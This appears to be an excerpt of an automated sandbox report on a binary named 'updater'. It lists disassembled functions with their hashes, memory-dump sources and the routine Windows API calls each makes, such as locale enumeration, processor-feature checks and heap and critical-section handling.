Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6847f40d2673af159ac1ced19a78da6bacca1c8687b668ad19e76648e6e2dd8e
Instruction ID: fcd759b64af90fd2541ea8d51486ef6d9ca19e72c19d7f9a2a0c551c6d4f6805
Opcode Fuzzy Hash: 6847f40d2673af159ac1ced19a78da6bacca1c8687b668ad19e76648e6e2dd8e
Instruction Fuzzy Hash: A0B15B312106049FE719CF2CC486B657BA1FF89365F258659E99ACF3B1C335E992CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0141E678 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0141E68E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 0364c88558fc5fb802577a269e05dc76b5f47fdd845cc1075357e79d753a6712
Instruction ID: 942fdefca8f3d95d6a16a4d0b4b892bc179030eba4eb5173a2d626d9c64cfa66
Opcode Fuzzy Hash: 0364c88558fc5fb802577a269e05dc76b5f47fdd845cc1075357e79d753a6712
Instruction Fuzzy Hash: 2F51ADB6E012058BEB2ACF59D891BAABBF1FB08314F14806BD915EB368D3749900CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0143AF98 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

Part of subcall function 0143049B: _free.LIBCMT ref: 014304FD
Part of subcall function 0143049B: _free.LIBCMT ref: 01430533

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0143AFEC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: b249f32d7506c43081f991e4d4b63e1ee91fbe7dfa89d1f8bbbe0af8dda2d73a
Instruction ID: ec8ab6c397af49fdc671b0cbe7bcf9a5eb94721d342f657f978bf602b6c4fa4c
Opcode Fuzzy Hash: b249f32d7506c43081f991e4d4b63e1ee91fbe7dfa89d1f8bbbe0af8dda2d73a
Instruction Fuzzy Hash: C421C8B1504206ABEB289F29DC41F7BB3B8EF99310F10407FEA11D6261EB74D9418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0143AC1F Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

EnumSystemLocalesW.KERNEL32(0143AD45,00000001,00000000,?,-00000050,?,0143B373,00000000,?,?,?,00000055,?), ref: 0143AC91

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bfcfc067c44c08d9689fc4c7bd9e8447274922f0f6aa8fc86765a529d50e06ec
Instruction ID: 5137ca3fd2f6060ffa398fbba7b6308f2a30a0703f22a809bae787cbd8866244
Opcode Fuzzy Hash: bfcfc067c44c08d9689fc4c7bd9e8447274922f0f6aa8fc86765a529d50e06ec
Instruction Fuzzy Hash: 1811253A2007055FDB189F39C8A55BAB792FFC8319B24452EE98787B50E771B903CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0143B1C4 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0143AF61,00000000,00000000,?), ref: 0143B1F0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 24ce53f12d4e6eacf96ad78c9b63e2326db29054d1f4c0428fda684b500f117f
Instruction ID: 1d507622f3dac510fe08b623452c289d37e38bc92a3b5fe904aba3289ab3b632
Opcode Fuzzy Hash: 24ce53f12d4e6eacf96ad78c9b63e2326db29054d1f4c0428fda684b500f117f
Instruction Fuzzy Hash: 82F02D36A00112BBEB385B25D80DBBF7B64EBC4354F14092AED02E7250DA30FE42C690

Uniqueness

Uniqueness Score: -1.00%

Function 0143ACBA Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

EnumSystemLocalesW.KERNEL32(0143AF98,00000001,00000000,?,-00000050,?,0143B337,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0143AD04

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 14ecdff8013c6c97d48232ccc371496e77a41afab75f58fbec0a3e1f85c4a918
Instruction ID: cf1ed208693dddcb9e9aaf1358500bf6054ea0757bef60ff1da277d743030d21
Opcode Fuzzy Hash: 14ecdff8013c6c97d48232ccc371496e77a41afab75f58fbec0a3e1f85c4a918
Instruction Fuzzy Hash: 91F046362403051FDB249F39D884A7ABB91EFC4328B24442EFA828B6A0C6719802C750

Uniqueness

Uniqueness Score: -1.00%

Function 0142F7EF Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0142703F: EnterCriticalSection.KERNEL32(?,?,01437562,?,014603C8,0000000C), ref: 0142704E

EnumSystemLocalesW.KERNEL32(0142F7E2,00000001,014601A0,0000000C,0142FC0D,00000000), ref: 0142F827

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: c3cef8afcabbcd153817777544a6204caa838ecf59d4fb6fa4dd480f50345ebe
Instruction ID: cabaa7aabfcd81da5a40e2a4c7054491da8f89e843a5890ab879122703c711c8
Opcode Fuzzy Hash: c3cef8afcabbcd153817777544a6204caa838ecf59d4fb6fa4dd480f50345ebe
Instruction Fuzzy Hash: 27F04F76A40211DFDB10DF99D441B9CB7F1EB24725F60412FE415E72B0C7B56944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0143ABD4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

EnumSystemLocalesW.KERNEL32(0143AB2D,00000001,00000000,?,?,0143B395,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0143AC0B

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8833a4b11a8891a64dba3541767536eadd8c9c6815cc52a5f8aabafbfc48ac20
Instruction ID: 60bc635fae7e5a3e778f3b692cd7b4976144400c435a406444768e9b30749a2c
Opcode Fuzzy Hash: 8833a4b11a8891a64dba3541767536eadd8c9c6815cc52a5f8aabafbfc48ac20
Instruction Fuzzy Hash: C4F0553A34020557CB18AF3AD849A6ABF95EFC5620B16406EFB06CB260C2319843C790

Uniqueness

Uniqueness Score: -1.00%

Function 013E2F5C Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 013E2F80

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: fb2d0ee3ad173cfbaa7256b2a8ed4bdaa5aec8769a170d86a860486cbc20e817
Instruction ID: cd19852448a02c323275246f3b163687a9959d65c027238584e13b6f882f6007
Opcode Fuzzy Hash: fb2d0ee3ad173cfbaa7256b2a8ed4bdaa5aec8769a170d86a860486cbc20e817
Instruction Fuzzy Hash: 60E086795053144FEF389B34A609B1A77E8A70860CF0000ADC50BD2192D7349549CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0142493E Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 01424ABA

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
Instruction ID: e81392808358a07960ccc07332abf75dc507e002f8d60ace9e013700dfbf204b
Opcode Fuzzy Hash: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
Instruction Fuzzy Hash: CB51B93030463856EB388A7D88957BFAF99DB62200FCC001FD643DB3B1C67199C68659

Uniqueness

Uniqueness Score: -1.00%

Function 013C4455 Relevance: 1.3, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9

GetProcessHeap.KERNEL32(?,00000000,013DDD2B,80070216,?,?,?,?,00000000,?,?,?,013C4770,?,00000003,00000000), ref: 013C4481

Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
String ID:
API String ID: 325507722-0
Opcode ID: d316b687ad7ad708fd6eddf02358ff2f08fb80e381be517ca02b53356ae79111
Instruction ID: cd2df4fe43498f88b459e91f2edc414bf10bb9b7838e20c285e89afe36bc5537
Opcode Fuzzy Hash: d316b687ad7ad708fd6eddf02358ff2f08fb80e381be517ca02b53356ae79111
Instruction Fuzzy Hash: 3711BCB1608240CBDA34ABA9F84871933A5A76067FF28010FE010CB2B8C7795841CB12

Uniqueness

Uniqueness Score: -1.00%

Function 013C8547 Relevance: .7, Instructions: 690COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
Instruction ID: 6b10d39cb8cbec30fde16a523ec0728cfdb3ccec653ef95a74247ac1a38b1485
Opcode Fuzzy Hash: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
Instruction Fuzzy Hash: 9E2282B7F515144BDB0CCA5DCCA23ECB2E3AFD4218B0E813DA90AE3745EA7DD9158684

Uniqueness

Uniqueness Score: -1.00%

Function 0142C6F6 Relevance: .7, Instructions: 655COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
Instruction ID: fd295ae81546bc7d48b7010190859f32126c1cfc9c5c257918a6ca58c58b18cb
Opcode Fuzzy Hash: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
Instruction Fuzzy Hash: 2032A074A0022ACFCB24CF5CC9D1ABEBBB5EF45304F54416EDD45A7365D632AA86CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01436129 Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bd7c0f442a287df14438af327f5789ccb0975b18f94941b029eb957485bd69
Instruction ID: 76035ea4a53814b2700cef0583ad516dcb52abbf5b43d8c245e1700595a3cf5d
Opcode Fuzzy Hash: 49bd7c0f442a287df14438af327f5789ccb0975b18f94941b029eb957485bd69
Instruction Fuzzy Hash: A1321661D25F425DD7279638D8223366648AFBB3C4F16D737F819B5ABAEB38C1834200

Uniqueness

Uniqueness Score: -1.00%

Function 013E9082 Relevance: .5, Instructions: 459COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
Instruction ID: d4147e5782d0dd5bdce54bdf4037e30c4da827a359616a7e999e1d781b98e9b5
Opcode Fuzzy Hash: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
Instruction Fuzzy Hash: 5A026E75E0032A9FDB15DF6CC494BADBBF6AF88218F144069D905AB391EB31ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01400EF6 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b6774da5a7a55f2a6389fc43ddd3608afeed8ae3b7978352f916df1d7f7f77
Instruction ID: e67923b747a5d12bd6caa560ab8f6d3c03cf69a7b6dedfd60659f0a9adb29cbb
Opcode Fuzzy Hash: 02b6774da5a7a55f2a6389fc43ddd3608afeed8ae3b7978352f916df1d7f7f77
Instruction Fuzzy Hash: 95027371E00B099FDB17CF6AC850AAEB7B5BF59790F11832AE8157B2A1D730D852CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013F364A Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalCurrentEnterSectionThread
String ID:
API String ID: 3488303727-0
Opcode ID: 675818256719f6a6ac736619fba1cc99eeab91af2acd3cc991f8b57e895c48bb
Instruction ID: bc82e861645f1b02d589fe1645161a8ba160957030b4549f2e1a350c513ec8cf
Opcode Fuzzy Hash: 675818256719f6a6ac736619fba1cc99eeab91af2acd3cc991f8b57e895c48bb
Instruction Fuzzy Hash: 03E10331A04363DFDB15DF38C8866EABBF1FF81324F148A6EE9854A241D7759846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0143A3E3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: 39e8132ef45594fbb6ca4847a29c6e0e16abc54317d4f061a252e9767761c3ad
Instruction ID: 82a1fd9c2fbe2589d8edd9eba4d8a2b2da8afdb7c09604094bb5e2bacfa14bc7
Opcode Fuzzy Hash: 39e8132ef45594fbb6ca4847a29c6e0e16abc54317d4f061a252e9767761c3ad
Instruction Fuzzy Hash: A1B119355403028BDB359B29CC91AB7B3E8EF98308F64452EDAC7C76A1E674E586CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0142836D Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
Instruction ID: 8304dd45d59e79cefa86e015daf241f2d90d8a58ac4b1f8cf903bdb8d7fa8844
Opcode Fuzzy Hash: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
Instruction Fuzzy Hash: C6516071E0012AEFDF05CF99C980AEEBBB2EF88304F59806DE515AB351D7359A51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0143EA5F Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a781e95d9bbaccbb2110fa6cde55ea0ccca5396d88f100734a1fbb5f73754b
Instruction ID: 0144c13604c8491ec711675f3448ecbae03fbc12c724b26e12429e299ff08d2e
Opcode Fuzzy Hash: f5a781e95d9bbaccbb2110fa6cde55ea0ccca5396d88f100734a1fbb5f73754b
Instruction Fuzzy Hash: D521A173F204394B7B0CC47E8C522B9B6E1878C501745823AF8A6EA2C1D968D917E2A4

Uniqueness

Uniqueness Score: -1.00%

Function 0143E93F Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2528de3e37a2383c09b2fcbedb639cb2713642eff2bb648f9967f84f8b08b7f
